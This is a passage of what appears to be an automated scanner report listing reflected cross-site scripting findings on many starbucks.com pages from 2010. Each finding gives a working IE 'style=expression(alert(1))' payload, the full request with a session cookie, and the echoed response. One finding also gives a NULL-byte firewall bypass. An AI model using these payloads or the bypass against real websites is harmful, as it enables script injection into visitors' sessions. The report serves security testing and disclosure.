GET /customer-service/faqs/menu?3f91e"style%3d"x%3aexpression(alert(1))"2090cf84852=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:32:38 GMT Connection: close Content-Length: 36961
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/menu?3f91e"style="x:expression(alert(1))"2090cf84852=1"/> ...[SNIP]...
3.47. http://www.starbucks.com/customer-service/faqs/responsibility [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/customer-service/faqs/responsibility
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd41a"style%3d"x%3aexpression(alert(1))"0e8674e1677 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dd41a"style="x:expression(alert(1))"0e8674e1677 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /customer-service/faqs/responsibility?dd41a"style%3d"x%3aexpression(alert(1))"0e8674e1677=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:35:18 GMT Connection: close Content-Length: 37184
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/responsibility?dd41a"style="x:expression(alert(1))"0e8674e1677=1"/> ...[SNIP]...
3.48. http://www.starbucks.com/customer-service/faqs/shop [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/customer-service/faqs/shop
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16d45"style%3d"x%3aexpression(alert(1))"16e2af548cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 16d45"style="x:expression(alert(1))"16e2af548cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /customer-service/faqs/shop?16d45"style%3d"x%3aexpression(alert(1))"16e2af548cc=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:36:44 GMT Connection: close Content-Length: 51551
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/shop?16d45"style="x:expression(alert(1))"16e2af548cc=1"/> ...[SNIP]...
3.49. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12942"style%3d"x%3aexpression(alert(1))"90f8a013063 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12942"style="x:expression(alert(1))"90f8a013063 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:32 GMT Content-Length: 72476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu?12942"style="x:expression(alert(1))"90f8a013063=1"/> ...[SNIP]...
3.50. http://www.starbucks.com/menu/drinks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50acb"style%3d"x%3aexpression(alert(1))"842d349c684 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 50acb"style="x:expression(alert(1))"842d349c684 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks?50acb"style%3d"x%3aexpression(alert(1))"842d349c684=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:18:14 GMT Connection: close Content-Length: 61971
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks?50acb"style="x:expression(alert(1))"842d349c684=1"/> ...[SNIP]...
3.51. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/frappuccino-blended-beverages
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1532"style%3d"x%3aexpression(alert(1))"3f7f1489b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f1532"style="x:expression(alert(1))"3f7f1489b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages?f1532"style%3d"x%3aexpression(alert(1))"3f7f1489b5=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:12:51 GMT Connection: close Content-Length: 50806
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages?f1532"style="x:expression(alert(1))"3f7f1489b5=1"/> ...[SNIP]...
3.52. http://www.starbucks.com/menu/food [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5cc1"style%3d"x%3aexpression(alert(1))"ffcdae7abe1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c5cc1"style="x:expression(alert(1))"ffcdae7abe1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food?c5cc1"style%3d"x%3aexpression(alert(1))"ffcdae7abe1=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:18:45 GMT Connection: close Content-Length: 56860
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food?c5cc1"style="x:expression(alert(1))"ffcdae7abe1=1"/> ...[SNIP]...
3.53. http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/cranberry-bliss-bar
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78c8e"style%3d"x%3aexpression(alert(1))"9db2eb51a72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 78c8e"style="x:expression(alert(1))"9db2eb51a72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/cranberry-bliss-bar?78c8e"style%3d"x%3aexpression(alert(1))"9db2eb51a72=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:04:47 GMT Connection: close Content-Length: 41261
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar?78c8e"style="x:expression(alert(1))"9db2eb51a72=1"/> ...[SNIP]...
3.54. http://www.starbucks.com/menu/nutrition [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/nutrition
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bff8"style%3d"x%3aexpression(alert(1))"2562d6e92e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2bff8"style="x:expression(alert(1))"2562d6e92e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/nutrition?2bff8"style%3d"x%3aexpression(alert(1))"2562d6e92e2=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:19:06 GMT Connection: close Content-Length: 48718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/nutrition?2bff8"style="x:expression(alert(1))"2562d6e92e2=1"/> ...[SNIP]...
3.55. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/nutrition/20-under-200
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1e9e"style%3d"x%3aexpression(alert(1))"6d79117ac61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1e9e"style="x:expression(alert(1))"6d79117ac61 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /menu/nutrition/20-under-200?d1e9e"style%3d"x%3aexpression(alert(1))"6d79117ac61=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:21:19 GMT Connection: close Content-Length: 38226
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/nutrition/20-under-200?d1e9e"style="x:expression(alert(1))"6d79117ac61=1"/> ...[SNIP]...
3.56. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/nutrition/20-under-200
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cccd"style%3d"x%3aexpression(alert(1))"1d36dcad9c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5cccd"style="x:expression(alert(1))"1d36dcad9c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:11 GMT Content-Length: 38226
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/nutrition/20-under-200?5cccd"style="x:expression(alert(1))"1d36dcad9c6=1"/> ...[SNIP]...
3.57. http://www.starbucks.com/menu/nutrition/35-under-350 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/nutrition/35-under-350
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6282"style%3d"x%3aexpression(alert(1))"6302ba5a92f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6282"style="x:expression(alert(1))"6302ba5a92f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/nutrition/35-under-350?c6282"style%3d"x%3aexpression(alert(1))"6302ba5a92f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:21:40 GMT Connection: close Content-Length: 40761
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/nutrition/35-under-350?c6282"style="x:expression(alert(1))"6302ba5a92f=1"/> ...[SNIP]...
3.58. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f9dd"style%3d"x%3aexpression(alert(1))"d76f2f8f40c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5f9dd"style="x:expression(alert(1))"d76f2f8f40c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility?5f9dd"style%3d"x%3aexpression(alert(1))"d76f2f8f40c=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 21:09:34 GMT Connection: close Content-Length: 56936
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility?5f9dd"style="x:expression(alert(1))"d76f2f8f40c=1"/> ...[SNIP]...
3.59. http://www.starbucks.com/responsibility/community [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/community
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81393"style%3d"x%3aexpression(alert(1))"7591aad8b9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81393"style="x:expression(alert(1))"7591aad8b9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/community?81393"style%3d"x%3aexpression(alert(1))"7591aad8b9b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:28:55 GMT Connection: close Content-Length: 40289
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/community?81393"style="x:expression(alert(1))"7591aad8b9b=1"/> ...[SNIP]...
3.60. http://www.starbucks.com/responsibility/community/community-service [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/community/community-service
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c425"style%3d"x%3aexpression(alert(1))"142c5cf33b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c425"style="x:expression(alert(1))"142c5cf33b3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/community/community-service?7c425"style%3d"x%3aexpression(alert(1))"142c5cf33b3=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:27:01 GMT Connection: close Content-Length: 37371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/community/community-service?7c425"style="x:expression(alert(1))"142c5cf33b3=1"/> ...[SNIP]...
3.61. http://www.starbucks.com/responsibility/community/starbucks-foundation [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/community/starbucks-foundation
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85521"style%3d"x%3aexpression(alert(1))"af4db09bc1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 85521"style="x:expression(alert(1))"af4db09bc1a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
